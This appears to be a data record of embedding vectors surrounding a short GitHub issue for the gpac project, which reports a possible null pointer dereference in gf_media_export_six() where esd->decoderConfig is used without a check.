-0.012644164264202118, 0.002918764716014266, 0.0011007366701960564, 0.019778922200202942, -0.004551746882498264, -0.0034071330446749926, -0.005032484419643879, -0.008645648136734962, 0.014734991826117039, -0.003929839935153723, -0.024082669988274574, 0.025288328528404236, 0.005272853188216686, 0.02357904054224491, -0.0005064915167167783, -0.012957025319337845, 0.009538446553051472, -0.012506810948252678, -0.01417794730514288, -0.006463251542299986, -0.009134015999734402, -0.0014984899898990989, -0.003061841242015362, 0.009072970598936081, 0.004811192397028208, -0.003800117177888751, 0.0016119974898174405, 0.012995179742574692, -0.025944573804736137, -0.036017175763845444, 0.002012612298130989, -0.010744106024503708, 0.011789520271122456, -0.01201081182807684, -0.010118383914232254, 0.009469769895076752, -0.008531186729669571, -0.008546448312699795, -0.004906577058136463, 0.017611786723136902, -0.017566002905368805, 0.009118754416704178, 0.007462880574166775, -0.0019820891320705414, -0.006825712509453297, -0.009416354820132256, 0.011827673763036728, -0.020679352805018425, -0.025456206873059273, -0.007462880574166775, 0.016894496977329254, -0.005490329582244158, 0.010942505672574043, 0.009301893413066864, -0.007897833362221718, 0.00719198863953352, 0.0169708039611578, 0.009729215875267982, -0.007436173036694527, 0.008004664443433285, -0.013567485846579075, -0.016574004665017128, -0.017611786723136902, -0.006219067145138979, 0.0047463309019804, 0.014696838334202766, 0.0077986340038478374, -0.015795666724443436, -0.00008691909170011058, -0.010751737281680107, 0.003557840595021844, 0.012598380446434021, -0.018283294513821602, 0.029317369684576988, -0.015490436926484108, 0.03299539536237717, 0.009515554644167423, 0.004769223276525736, -0.0014202747261151671, 0.0013697209069505334, -0.018496954813599586, 0.008508293889462948, -0.01410163938999176, -0.006314451806247234, -0.004460177384316921, -0.008119125850498676, -0.020908275619149208, -0.020236767828464508, -0.019183723255991936, -0.02779121696949005, 0.02032833732664585, -0.0015814744401723146, 0.023533254861831665, -0.007138573564589024, 0.006070267409086227, 0.017153942957520485, -0.001778920297510922, 0.00036532251397147775, -0.0004075301403645426, -0.024998361244797707, -0.021228766068816185, 0.007787187583744526, 0.014406869187951088, -0.021121935918927193, -0.012361826375126839, -0.013742993585765362, -0.018008587881922722, 0.019992584362626076, 0.003479625331237912, 0.003929839935153723, 0.007336973212659359, -0.012903610244393349, -0.015933021903038025, 0.015917759388685226, -0.009736846201121807, -0.007657465059310198, 0.001148429000750184, 0.012796780094504356, -0.0022911347914487123, 0.011568227782845497, 0.013010441325604916, -0.011423243209719658, -0.00002634995871630963, 0.0001273382658837363, 0.006779927760362625, 0.010469398461282253, 0.017428649589419365, -0.008332787081599236, 0.0024761806707829237, -0.005414022132754326, 0.007958879694342613, 0.016253512352705002, -0.0017092896159738302, -0.006657835561782122, 0.00417402433231473, 0.009836046025156975, -0.017031850293278694, -0.000015127379811019637, 0.01616194285452366, -0.002581103704869747, 0.007646018639206886, 0.013201209716498852, 0.00009478830907028168, -0.0002196227287640795, -0.014063485898077488, -0.00121329037938267, 0.0009638600167818367, -0.0013706748140975833, -0.010477029718458652, -0.0250899288803339, -0.0007368450169451535, -0.006516666617244482, 0.0023083039559423923, -0.039008431136608124, -0.001737904967740178, 0.009454508312046528, 0.009851307608187199, -0.024097930639982224, -0.0278217401355505, -0.01858852431178093, -0.004845530726015568, -0.001468920730985701, 0.003897409187629819, -0.034674160182476044, 0.003813470946624875, 0.00004959992293152027, 0.027745433151721954, 0.0009037678246386349, -0.012796780094504356, -0.005032484419643879, 0.013269886374473572, 0.002674580318853259, -0.02632611244916916, 0.010728844441473484, -0.0028596261981874704, 0.014811299741268158, -0.002869164803996682, 0.007428542245179415, -0.0027737801428884268, 0.015765143558382988, 0.007466695737093687, 0.0010826137149706483, -0.007581157144159079, 0.00023750732361804694, -0.0012895979452878237, 0.01953473873436451, -0.013819301500916481, -0.0017064281273633242, -0.008531186729669571, -0.025334114208817482, 0.006192359607666731, -0.022831225767731667, -0.011011182330548763, -0.014742623083293438, -0.011705581098794937, 0.008332787081599236, -0.008264110423624516, 0.02968364581465721, -0.005005776882171631, -0.010591491125524044, -0.00014546130842063576, 0.019626308232545853, -0.015688836574554443, -0.013391979038715363, 0.028432201594114304, 0.0028748877812176943, 0.0010444598738104105, -0.004269408527761698, -0.0009047216735780239, 0.01939738541841507, 0.01125536672770977, 0.023289071395993233, -0.01330040954053402, 0.005635314155369997, 0.008447248488664627, 0.007974141277372837, 0.01478077657520771, 0.00023440732911694795, -0.010705952532589436, -0.007577341981232166, -0.004555562045425177, -0.023960577324032784, 0.010515183210372925, -0.0028519954066723585, 0.01010312233120203, -0.005482699256390333, -0.011850565671920776, -0.0013201209949329495, -0.006566266529262066, 0.01363616343587637, 0.01247628778219223, -0.028691647574305534, -0.011682689189910889, -0.0025677497033029795, 0.0077566648833453655, 0.007859679870307446, -0.0058260830119252205, -0.007161465473473072, 0.005425468552857637, -0.008981401100754738, 0.017138680443167686, -0.036841295659542084, -0.009240847080945969, 0.022159717977046967, -0.014223731122910976, 0.001478459220379591, -0.014025331474840641, 0.0036703941877931356, 0.003655132604762912, 0.00471199257299304, -0.00834804866462946, -0.0003326533187646419, 0.02185448817908764, -0.018756400793790817, 0.009805522859096527, -0.005120238289237022, -0.008309894241392612, 0.020297814160585403, 0.0009776907972991467, 0.011232474818825722, -0.0026249804068356752, 0.0028806107584387064, -0.006646389607340097, 0.0016291666543111205, -0.014162685722112656, 0.018145941197872162, -0.012857825495302677, -0.013048594817519188, -0.01430766936391592, -0.010278630070388317, -0.03192708641290665, -0.002956918440759182, 0.007752849254757166, -0.012590749189257622, 0.0074934037402272224, 0.005188914947211742, -0.0023121193516999483, 0.005581899080425501, -0.003937470726668835, 0.014704468660056591, 0.0017197818960994482, -0.00025491497945040464, -0.02684500440955162, -0.005494145210832357, 0.0030847336165606976, 0.0057574063539505005, -0.016192466020584106, -0.0060282982885837555, -0.0010778444120660424, 0.01078225951641798, 0.023548517376184464, -0.021137196570634842, 0.024082669988274574, 0.0021194429136812687, -0.014361085370182991, -0.010423614643514156, -0.00293211848475039, -0.008721955120563507, 0.03943575173616409, 0.016253512352705002, -0.0024685498792678118, -0.008592233061790466, -0.009088232181966305, 0.011980288662016392, 0.010957767255604267, -0.013674316927790642, 0.006886758375912905, -0.00970632303506136, 0.0053834994323551655, -0.008859309367835522, -0.014292407780885696, 0.0026917497161775827, 0.010270998813211918, 0.004296116530895233, -0.012865456752479076, -0.010744106024503708, -0.0001881458592833951, 0.019061630591750145, 0.0005780298379249871, -0.00035029943683184683, 0.021946057677268982, -0.015101268887519836, 0.0176270492374897, 0.0018094433471560478, -0.0025448575615882874, -0.016116159036755562, -0.002067935187369585, -0.023380640894174576, 0.005043930374085903, 0.019214246422052383, -0.02481522224843502, -0.012827303260564804, 0.03009570576250553, -0.02860007807612419, 0.004811192397028208, 0.023411162197589874, 0.014048224315047264, 0.011652166023850441, 0.009759738110005856, 0.006341159343719482, 0.0040557472966611385, -0.014139792881906033, 0.010599121451377869, -0.008783001452684402, 0.00977499969303608, 0.006890573538839817, -0.00834804866462946, 0.005436914507299662, 0.011820042505860329, 0.0037352556828409433, -0.012651795521378517, 0.016467174515128136, -0.009469769895076752, 0.006528112571686506, -0.008363310247659683, 0.008836416527628899, -0.0011016905773431063, 0.014002439565956593, 0.01160638127475977, -0.026951834559440613, -0.0007707064505666494, 0.010408353060483932, 0.008042817935347557, 0.009973399341106415, 0.003941285889595747, 0.014879976399242878, -0.004727254156023264, 0.010156537406146526, 0.021396642550826073, 0.014460285194218159, 0.00013580363884102553, 0.006001590751111507, 0.02141190506517887, -0.005414022132754326, 0.00532245310023427, 0.00787494145333767, -0.0010721214348450303, 0.01654348149895668, 0.009691061452031136, 0.009942876175045967, -0.02292279526591301, -0.0023083039559423923, 0.018786923959851265, -0.0008451063768006861, 0.008851678110659122, -0.014864714816212654, 0.009240847080945969, -0.03626135736703873, 0.012377087958157063, 0.018741140142083168, 0.01599406637251377, 0.031209796667099, 0.01484945323318243, 0.002626888221129775, -0.025654606521129608, -0.02371639385819435, 0.009370570071041584, 0.014071116223931313, -0.019473692402243614, -0.013315671123564243, -0.002682211110368371, -0.008630386553704739, 0.0009605215745978057, -0.009721584618091583, -0.007634572684764862, 0.029118970036506653, 0.021930797025561333, 0.014139792881906033, -0.001200890401378274, 0.008660909719765186, 0.014597638510167599, 0.007146203890442848, 0.003264056285843253, -0.018268031999468803, 0.02873743139207363, 0.004860792309045792, -0.011827673763036728, 0.011163798160851002, -0.02130507491528988, -0.0011436596978455782, -0.017581265419721603, 0.003239256329834461, -0.00881352461874485, -0.0003426687035243958, -0.008180171251296997, -0.0015986436046659946, -0.013575117103755474, 0.014902869239449501, 0.012438134290277958, 0.0052499608136713505, 0.005017222836613655, 0.018405387178063393, -0.0011131366482004523, 0.03229336440563202, 0.013269886374473572, 0.0008131525828503072, 0.010545706376433372, 0.01571935974061489, -0.007512480486184359, 0.004898946266621351, -0.004685285035520792, -0.006283928640186787, -0.002064119791612029, -0.009195062331855297, 0.006104605738073587, -0.001468920730985701, 0.016757143661379814, 0.005696360021829605, -0.007233957760035992, 0.019183723255991936, 0.000877060170751065, 0.009446877054870129, -0.034765731543302536, 0.008424355648458004, -0.01680292747914791, 0.006428912747651339, -0.019916275516152382, -0.007478142157196999, 0.0094926618039608, 0.004162577912211418, 0.007039373740553856, -0.0013201209949329495, 0.005085899494588375, -0.02142716571688652, 0.015513329766690731, -0.001782735693268478, 0.00989709235727787, 0.0025086114183068275, -0.002623072825372219, -0.0018752586329355836, 0.0037905785720795393, 0.009660538285970688, -0.0030561182647943497, -0.025166237726807594, -0.00982841569930315, -0.015566744841635227, 0.017581265419721603, -0.010270998813211918, -0.012087119743227959, -0.007821526378393173, 0.0021194429136812687, -0.006623497232794762, 0.006642573978751898, -0.008683801628649235, -0.007470511365681887, 0.001514705247245729, 0.017153942957520485, 0.021503474563360214, -0.01397954672574997, 0.012628903612494469, 0.0056810989044606686, -0.02008415386080742, 0.019458431750535965, 0.026204019784927368, -0.009279000572860241, 0.018268031999468803, 0.036566589027643204, 0.0058604213409125805, -0.010461768135428429, -0.017688095569610596, -0.0030942719895392656, 0.004467808175832033, -0.008592233061790466, 0.012590749189257622, -0.0010997828794643283, -0.024204762652516365, -0.010965398512780666, -0.0014269516104832292, 0.010843305848538876, -0.007821526378393173, 0.006493774242699146, -0.022587040439248085, 0.0019611045718193054, -0.007348419167101383, 0.017276033759117126, 0.0059367292560637, 0.002380796242505312, -0.007092788815498352, 0.0016406128415837884, -0.002659318968653679, 0.015963543206453323, -0.012300780974328518, 0.01099592074751854, 0.019229508936405182, -0.011339304968714714, -0.015086007304489613, 0.0031400565057992935, -0.005887129344046116, 0.009088232181966305, 0.008790632709860802, 0.014048224315047264, -0.007913094945251942, -0.006241959519684315, 0.008157279342412949, -0.013102009892463684, 0.004105347208678722, -0.02063356712460518, 0.0010435060830786824, 0.0024208577815443277, -0.019168462604284286, 0.006924912333488464, -0.0025563037488609552, -0.030339891090989113, -0.00862275529652834, 0.012445764616131783, 0.0014441207749769092, -0.007207250222563744, -0.002623072825372219, 0.011598750948905945, -0.0013191672042012215, 0.028829000890254974, 0.008966139517724514, 0.004319008439779282, 0.01153770461678505, -0.0003803455620072782, -0.002087012166157365, -0.01776440255343914, 0.001192305819131434, -0.017993325367569923, 0.006127498112618923, 0.002987441373988986, 0.011949765495955944, 0.00996576901525259, -0.018268031999468803, 0.013552225194871426, 0.023304332047700882, -0.0044945161789655685, 0.012277888134121895, -0.014864714816212654, 0.0010301521979272366, -0.0061656516045331955, 0.0004917069454677403, -0.009752107784152031, -0.01694028079509735, 0.006860050838440657, -0.028935831040143967, 0.015147052705287933, 0.005135499406605959, 0.022892272099852562, 0.012125273235142231, 0.0022682426497340202, -0.021885011345148087, 0.01816120184957981, 0.021457688882946968, -0.002970272209495306, 0.006417466793209314, 0.007115681190043688, -0.0033594409469515085, 0.026783958077430725, 0.015169945545494556, 0.03687181696295738, -0.0018676278414204717, 0.0004690531059168279, -0.006001590751111507, 0.0013191672042012215, -0.0002930687624029815, -0.013575117103755474, -0.011636904440820217, -0.00239033461548388, -0.014879976399242878, 0.04154184088110924, -0.007794818375259638, 0.001784643391147256, 0.0024914422538131475, -0.009919984266161919, 0.03824535384774208, -0.0004659531114157289, -0.010492291301488876, -0.02128981240093708, 0.018893754109740257, 0.00244374992325902, -0.02385374717414379, 0.016650311648845673, -0.015643052756786346, 0.01111801341176033, -0.0020107044838368893, -0.0009576600277796388, -0.003538763616234064, 0.0084854019805789, -0.0073522343300282955, -0.0040633780881762505, 0.018771663308143616, 0.028829000890254974, -0.007470511365681887, -0.00349107151851058, 0.014284777455031872, -0.011461397632956505, -0.003237348748371005, 0.011758997105062008, 0.003027502913028002, -0.010362568311393261, -0.03433840721845627, -0.028279585763812065, -0.027714909985661507, 0.014979176223278046, -0.0028310108464211226, 0.009546076878905296, -0.0003603148215916008, -0.01723024994134903, 0.0033995022531598806, -0.017443910241127014, -0.006852420046925545, 0.02142716571688652, 0.008615124970674515, -0.011766627430915833, -0.024494729936122894, -0.00046404541353695095, -0.00303704128600657, 0.005925282835960388, 0.00977499969303608, -0.007836787961423397, -0.01721498742699623, -0.002327380934730172, -0.02319750189781189, 0.027470726519823074, -0.007008850574493408, 0.0010043984511867166, -0.0023159347474575043, -0.010148907080292702, 0.00874484796077013, -0.004364793188869953, -0.00651285145431757, 0.004517408087849617, 0.018390124663710594, -0.005425468552857637, 0.01614668220281601, -0.00579556031152606, -0.007245404180139303, -0.006207621190696955, 0.014162685722112656, -0.007115681190043688, 0.006047375034540892, -0.008317525498569012, 0.0006133221322670579, 0.007615495473146439, -0.011644535697996616, -0.002935933880507946, 0.0025353191886097193, -0.017443910241127014, -0.0018771662143990397, 0.017657572403550148, 0.01721498742699623, -0.002098458120599389, -0.028829000890254974, 0.0015385514125227928, 0.018283294513821602, 0.017611786723136902, 0.016848711296916008, -0.008119125850498676, 0.002962641417980194, 0.0019448891980573535, 0.005051561165601015, 0.0076231262646615505, -0.021106675267219543, 0.02562408335506916, -0.0016759050777181983, 0.0024170423857867718, -0.02357904054224491, -0.0031152565497905016, 0.005459806881844997, 0.010484660044312477, -0.012514442205429077, 0.005341529846191406, 0.026829741895198822, -0.0012733825715258718, 0.011285889893770218, 0.005192730110138655, 0.02264808677136898, -0.008157279342412949, -0.02808118611574173, 0.002724180230870843, -0.015284406952559948, -0.004551746882498264, 0.02347220852971077, 0.0018113510450348258, 0.0019935353193432093, -0.007821526378393173, -0.01587197557091713, 0.02049621380865574, 0.010156537406146526, -0.01201081182807684, -0.011026443913578987, -0.016894496977329254, -0.008500663563609123, 0.0010339675936847925, -0.0038821478374302387, -0.0004070532158948481, 0.0013296594843268394, -0.009584231302142143, 0.0094926618039608, -0.012323672883212566, 0.0070470040664076805, 0.006467066705226898, 0.01723024994134903, -0.01078989077359438, -0.0038325476925820112, 0.007420911453664303, -0.0051469458267092705, 0.00028496107552200556, 0.05616237223148346, 0.007211065385490656, -0.004830269142985344, 0.0007335065165534616, -0.0024819038808345795, -0.0027775955386459827, -0.0021995657589286566, -0.013926131650805473, -0.0021118121221661568, -0.005494145210832357, 0.0008265064097940922, 0.006905835121870041, 0.0058184522204101086, -0.020679352805018425, -0.008691432885825634, 0.012491549365222454, -0.002975995419546962, 0.006463251542299986, -0.021900273859500885, 0.0006557682063430548, 0.005982513539493084, -0.015963543206453323, 0.0036646712105721235, -0.0027604263741523027, -0.013880346901714802, 0.010766998864710331, 0.0004752530949190259, -0.014727361500263214, -0.012033703736960888, -0.016390865668654442, 0.010667798109352589, -0.01571935974061489, -0.015826189890503883, -0.0019057815661653876, -0.004990515299141407, 0.011560597456991673, 0.008256479166448116, 0.01802384853363037, -0.012499180622398853, -0.025868266820907593, 0.0016472897259518504, -0.0196568313986063, -0.0043609775602817535, 0.003929839935153723, -0.01628403551876545, 0.025593560189008713, -0.026356635615229607, 0.03882529214024544, 0.012361826375126839, 0.007031742949038744, 0.005852790549397469, 0.008164910599589348, -0.010492291301488876, 0.03604769706726074, 0.019504215568304062, -0.011346936225891113, 0.013681947253644466, -0.01452133059501648, -0.020313074812293053, -0.0008212602697312832, 0.007306450046598911, 0.015040222555398941, -0.017733879387378693, -0.027226541191339493, -0.0010911982972174883, 0.010270998813211918, 0.013643793761730194, 0.005177468527108431, 0.0017989510670304298, 0.037116002291440964, -0.0045975311659276485, -0.004681469406932592, -0.00902718584984541, -0.017428649589419365, 0.004719623364508152, -0.010667798109352589, -0.002979810582473874, -0.005143130198121071, 0.007230142597109079, 0.006348790135234594, -0.01735234260559082, -0.013430132530629635, -0.0016759050777181983, -0.009530815295875072, 0.020282553508877754, -0.02483048476278782, 0.010744106024503708, -0.0035902713425457478, -0.0002971226058434695, -0.006589158903807402, 0.011476659215986729, 0.009820784442126751, -0.0010101214284077287, -0.010850937105715275, 0.011751365847885609, -0.009919984266161919, 0.025990359485149384, -0.0008994755335152149, -0.0035597481764853, -0.0002048381429631263, 0.004879869055002928, 0.007447618991136551, -0.029653122648596764, 0.00755826523527503, 0.013468286022543907, -0.00909586250782013, -0.008035187609493732, -0.008157279342412949, -0.010919613763689995, -0.013620901852846146, 0.020938796922564507, 0.0037734094075858593, -0.01417031604796648, 0.0033575331326574087, -0.011965027078986168, 0.006108421366661787, 0.011758997105062008, -0.016375605016946793, 0.007195804268121719, 0.022877009585499763, 0.008470140397548676, 0.0016425205394625664, -0.0025639343075454235, -0.02223602682352066, -0.023517994210124016, -0.0019363046158105135, 0.015543852001428604, 0.012232103385031223, 0.014666315168142319, 0.0028710723854601383, 0.008729586377739906, -0.008508293889462948, 0.015475175343453884, 0.017581265419721603, 0.02644820511341095, 0.004963807761669159, 0.01160638127475977, 0.021488212049007416, 0.0031343335285782814, 0.01355985552072525, 0.008218325674533844, 0.032629117369651794, 0.006344974506646395, -0.005185099318623543, -0.019198985770344734, 0.0051469458267092705, -0.005265222396701574, -0.01750495657324791, -0.0048684231005609035, 0.005776483099907637, 0.03162185847759247, -0.006169467233121395, 0.011705581098794937, -0.010263368487358093, 0.0005608606734313071, 0.02399110049009323, 0.010667798109352589, 0.03891686350107193, -0.004215993452817202, -0.00007583064871141687, 0.00840909406542778, 0.009301893413066864, 0.01600932888686657, -0.015032591298222542, 0.01315542496740818, -0.011705581098794937, 0.025700390338897705, 0.01301807165145874, 0.008615124970674515, -0.006917281541973352, -0.02942419983446598, -0.0049447305500507355, 0.01721498742699623, -0.01403296273201704, 0.02942419983446598, 0.021396642550826073, 0.009401093237102032, 0.011034075170755386, 0.019778922200202942, 0.008019926026463509, 0.0005599068244919181, 0.0018542739562690258, -0.013720101676881313, -0.012712841853499413, 0.031102966517210007, -0.016772404313087463, -0.0019200892420485616, -0.0077566648833453655, 0.012239734642207623, 0.011514812707901001, 0.018786923959851265, -0.017443910241127014, 0.018695354461669922, 0.00834041740745306, 0.003922209143638611, 0.02589878998696804, -0.003027502913028002, 0.016497697681188583, 0.011766627430915833, -0.003342271549627185, 0.02022150717675686, -0.011987919919192791, 0.023304332047700882, -0.0027623341884464025 ]
2,281
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
https://github.com/gpac/gpac/blob/4a8000c4595bcff82fe54afc4f6a515c2e1322ba/src/media_tools/media_export.c#L910-L922 The esd->decoderConfig is not checked before referenced.
Possible null pointer dereference in gf_media_export_six()
https://api.github.com/repos/gpac/gpac/issues/1811/comments
1
2021-05-26T06:52:05
2021-05-26T15:38:34Z
https://github.com/gpac/gpac/issues/1811
901,853,032
1,811
false
This is a GitHub Issue repo:gpac owner:gpac Title : Possible null pointer dereference in gf_media_export_six() Issue date: --- start body --- https://github.com/gpac/gpac/blob/4a8000c4595bcff82fe54afc4f6a515c2e1322ba/src/media_tools/media_export.c#L910-L922 The esd->decoderConfig is not checked before referenced. --- end body ---
336
[ -0.01755746454000473, 0.05735621228814125, -0.017352035269141197, 0.007025725208222866, -0.021597599610686302, -0.014065145514905453, -0.020406102761626244, 0.03684054687619209, -0.01594141125679016, 0.0029342330526560545, -0.03259498253464699, 0.013825476169586182, -0.0025558986235409975, 0.028404198586940765, 0.015215556137263775, 0.054480183869600296, -0.013277661986649036, 0.009559368714690208, -0.02151542715728283, 0.016927476972341537, 0.02425450086593628, -0.03095153719186783, -0.0007249986520037055, 0.017790285870432854, -0.0042113265953958035, 0.024542104452848434, -0.02293974533677101, 0.002908554393798113, 0.003305719932541251, -0.019269386306405067, 0.007840599864721298, 0.022652143612504005, -0.005563744343817234, 0.02985590696334839, 0.04993332177400589, 0.009929143823683262, 0.033307142555713654, 0.04366084188222885, 0.02303561381995678, 0.018570922315120697, -0.01920090988278389, -0.03456711396574974, -0.027007270604372025, 0.007238003425300121, -0.0036053063813596964, 0.023651905357837677, -0.005193969234824181, 0.005406247451901436, -0.007922771386802197, 0.02066631428897381, 0.02403537556529045, -0.027678344398736954, -0.024336673319339752, -0.05899965763092041, -0.012497025541961193, -0.02278909645974636, 0.016256405040621758, 0.0034204188268631697, -0.020940221846103668, 0.03733358159661293, 0.00023260730085894465, 0.012360071763396263, -0.011908124200999737, 0.007854294963181019, 0.0005837651551701128, 0.003497455269098282, 0.003851823043078184, 0.0005739215994253755, -0.00028054110589437187, 0.024870792403817177, 0.002165580401197076, -0.022843878716230392, -0.021556513383984566, 0.04300346225500107, 0.05056330934166908, -0.05242587625980377, 0.022830182686448097, 0.04256521165370941, -0.01153150200843811, 0.010319462046027184, -0.047851625829935074, 0.002896570833399892, -0.02136477828025818, -0.006936705205589533, -0.0003965237701777369, -0.011558892205357552, -0.03259498253464699, -0.07050376385450363, -0.016667265444993973, 0.004807075019925833, -0.0077104936353862286, 0.009484044276177883, 0.00040850721416063607, 0.0011735220905393362, 0.03618316724896431, 0.005639068782329559, -0.020940221846103668, -0.01308592688292265, -0.0196254663169384, -0.01698225922882557, -0.04366084188222885, -0.010387938469648361, 0.022159108892083168, 0.01670835167169571, 0.005721241235733032, 0.005029624793678522, 0.005875314120203257, -0.01440752949565649, 0.022624751552939415, 0.13980233669281006, 0.014722523279488087, -0.04387996718287468, -0.015119688585400581, -0.016420749947428703, 0.017146604135632515, 0.007511910516768694, -0.017447901889681816, -0.005885585676878691, 0.011695845983922482, -0.009833276271820068, 0.004868704359978437, -0.016571398824453354, -0.0053754327818751335, 0.0438251867890358, -0.00014283842756412923, 0.07373587787151337, -0.020104803144931793, -0.0064299763180315495, -0.034402769058942795, -0.006245088763535023, -0.02069370448589325, -0.015434682369232178, 0.004745445679873228, 0.00870340783149004, -0.0009552520932629704, 0.0036703592631965876, -0.01661248505115509, 0.02291235513985157, 0.007922771386802197, 0.011182270012795925, -0.06283435970544815, -0.04029177874326706, 0.05708230286836624, -0.023104090243577957, -0.04105871915817261, -0.013154403306543827, 0.007826903834939003, 0.011319223791360855, -0.027637258172035217, -0.009449806064367294, -0.018146365880966187, 0.023679295554757118, 0.042428258806467056, -0.02717161551117897, 0.026185547932982445, 0.0127024557441473, 0.006727850530296564, 0.01850244589149952, -0.01889961212873459, 0.0176533330231905, -0.011100097559392452, -0.025295348837971687, 0.00398535281419754, -0.026007508859038353, -0.0012616859748959541, -0.03273193538188934, 0.010018163360655308, 0.008915686048567295, -0.03790878504514694, 0.02656901814043522, -0.03503275662660599, -0.01226420421153307, -0.019707638770341873, -0.017612246796488762, -0.029417656362056732, -0.019762419164180756, 0.00397850526496768, 0.06294392049312592, -0.034430161118507385, -0.01636596769094467, -0.019885677844285965, 0.01410623174160719, 0.018023107200860977, 0.006159492768347263, 0.009566215798258781, -0.015270338393747807, 0.021529123187065125, -0.0290615763515234, 0.014873172156512737, -0.022282367572188377, -0.0014910834142938256, 0.0037182930391281843, -0.004338008817285299, -0.018598312512040138, 0.0068613807670772076, -0.014722523279488087, -0.026377283036708832, -0.02689770795404911, -0.017502684146165848, 0.0010690948693081737, 0.008402110077440739, -0.0030763226095587015, 0.02011849917471409, 0.00356764392927289, -0.01579076237976551, 0.00356764392927289, -0.022200195118784904, 0.04177087917923927, 0.0062485127709805965, -0.03191021457314491, -0.008491129614412785, -0.052562832832336426, 0.03815530240535736, -0.02236454002559185, -0.0004729182692244649, 0.00967577937990427, -0.007669407408684492, -0.018269624561071396, 0.00010956296318909153, -0.010771408677101135, 0.034731458872556686, 0.0022837030701339245, -0.009189593605697155, -0.01055913046002388, -0.027363350614905357, -0.010620759800076485, 0.02109087072312832, -0.008847209624946117, 0.016598789021372795, 0.00740919541567564, 0.03314279764890671, -0.001553568639792502, 0.012627131305634975, -0.02266583777964115, -0.017228776589035988, -0.01040848158299923, 0.018981782719492912, -0.02029653824865818, -0.021309996023774147, 0.00162033352535218, -0.01746159791946411, 0.02991068921983242, -0.01510599348694086, -0.01468143705278635, -0.016270099207758904, 0.029472436755895615, 0.019707638770341873, -0.032485418021678925, 0.0013310188660398126, 0.027678344398736954, -0.022254977375268936, -0.05675361678004265, -0.022008460015058517, -0.0009407007601112127, 0.0018677061889320612, -0.014558178372681141, 0.024788619950413704, 0.047303810715675354, -0.03738836199045181, -0.03234846517443657, 0.0011375717585906386, -0.04420865699648857, -0.003769650822505355, -0.04396213963627815, -0.019735028967261314, -0.01832440495491028, -0.002302534179762006, 0.008929381147027016, -0.008648626506328583, -0.020228061825037003, 0.027363350614905357, -0.02787007950246334, -0.03380017355084419, -0.027185309678316116, 0.007963857613503933, -0.01716029830276966, 0.011079554446041584, 0.02550077997148037, 0.009175898507237434, 0.027787907049059868, -0.013229727745056152, -0.002838365500792861, -0.028623323887586594, 0.025733601301908493, 0.018269624561071396, 0.03952483832836151, 0.03125283494591713, 0.004707783460617065, -0.02440514974296093, 0.009155355393886566, 0.033005841076374054, 0.005837651435285807, -0.05702752247452736, 0.017023345455527306, -0.0023504679556936026, 0.0234327781945467, 0.004029862582683563, 0.017749199643731117, -0.028349416330456734, 0.028760278597474098, 0.0005550904897972941, 0.014996430836617947, -0.008573302067816257, 0.013852867297828197, -0.03273193538188934, 0.012058774009346962, -0.034128863364458084, -0.006916162092238665, -0.00004041739157401025, 0.00397850526496768, 0.03544361889362335, -0.042126961052417755, -0.02513100393116474, -0.01862570457160473, -0.00393399503082037, -0.026527931913733482, -0.023939507082104683, -0.018297014757990837, 0.005539777223020792, 0.033361922949552536, 0.002509676618501544, 0.01384601928293705, -0.0290615763515234, -0.026418369263410568, 0.003312567714601755, -0.01337352953851223, -0.004704359918832779, 0.03648446872830391, -0.05300108343362808, 0.002958199940621853, 0.042126961052417755, 0.02415863424539566, 0.008395262062549591, -0.03174586966633797, 0.008785580284893513, -0.04470168799161911, -0.011168574914336205, -0.009292309172451496, 0.012606588192284107, -0.020337624475359917, 0.01805049739778042, -0.010175660252571106, 0.021036088466644287, -0.03538883849978447, 0.0016100619686767459, -0.012921581976115704, 0.02592533640563488, -0.008806123398244381, -0.004341432359069586, -0.012202574871480465, 0.0006817726534791291, 0.007429738529026508, 0.007032572757452726, 0.0026877163909375668, 0.029225921258330345, 0.015201861038804054, -0.02224128134548664, -0.01716029830276966, -0.021337388083338737, 0.006943552754819393, 0.028130291029810905, -0.049522459506988525, -0.002846925053745508, 0.0410861112177372, 0.011627369560301304, 0.04987853765487671, 0.0004433876310940832, -0.018201148137450218, 0.009066334925591946, 0.003886061254888773, -0.0006051641539670527, 0.007251698523759842, -0.05017983913421631, 0.021611293777823448, 0.0076831029728055, 0.029006794095039368, -0.004724903032183647, 0.01564011350274086, -0.05817793309688568, 0.005382280796766281, -0.019365252926945686, 0.023446474224328995, 0.015434682369232178, -0.024446235969662666, 0.016146842390298843, 0.017571160569787025, -0.05379541590809822, 0.0502072274684906, -0.015599027276039124, -0.027281178161501884, -0.03675837442278862, 0.04891986399888992, -0.016516616567969322, -0.05565798655152321, -0.031088490039110184, 0.012031382881104946, 0.031417179852724075, -0.015393596142530441, 0.005491843447089195, -0.02278909645974636, 0.005847922991961241, -0.02109087072312832, -0.0008859192603267729, 0.0019002326298505068, -0.021857811138033867, 0.0010776544222608209, 0.0033998757135123014, -0.009470348246395588, 0.02452840842306614, 0.028130291029810905, 0.01944742538034916, -0.03511492908000946, -0.029445046558976173, -0.02766464836895466, 0.020214367657899857, 0.048152923583984375, 0.007826903834939003, 0.035251881927251816, -0.0313350073993206, -0.0023401963990181684, -0.024911878630518913, 0.01413362193852663, 0.006234817206859589, 0.019913068041205406, 0.05026200786232948, 0.0023042461834847927, -0.028678106144070625, 0.030650239437818527, 0.037744440138339996, -0.017872458323836327, -0.0056356447748839855, -0.023747771978378296, -0.02236454002559185, -0.020529359579086304, 0.01807788945734501, -0.010216746479272842, -0.01725616678595543, -0.05549364164471626, -0.0014936513034626842, -0.0145307881757617, -0.02634989283978939, 0.01889961212873459, 0.0261718537658453, 0.008066573180258274, 0.03341670334339142, -0.06984639167785645, -0.04464690759778023, -0.024240804836153984, 0.020036326721310616, -0.0005490987678058445, -0.004002471920102835, -0.006173188332468271, 0.0162837952375412, -0.024076461791992188, 0.0035984585992991924, 0.018707875162363052, -0.02802072837948799, -0.009086878038942814, 0.02315887063741684, 0.002841789275407791, -0.03215672820806503, 0.03245802968740463, -0.006371770985424519, 0.005170002114027739, -0.003360501490533352, -0.010785103775560856, -0.027185309678316116, -0.015311424620449543, 0.00033874643850140274, -0.023843640461564064, 0.019132431596517563, -0.005224783904850483, 0.03130761533975601, 0.009545673616230488, -0.01524294726550579, 0.041003938764333725, -0.015653807669878006, -0.004666697699576616, 0.01947481743991375, -0.025692515075206757, -0.026829231530427933, -0.010189355351030827, -0.0066901883110404015, 0.044318217784166336, -0.004502353258430958, 0.02293974533677101, 0.02376146800816059, 0.015982497483491898, -0.02358342707157135, -0.008922534063458443, -0.010018163360655308, 0.0462629608809948, -0.0026329350657761097, -0.013476244173943996, 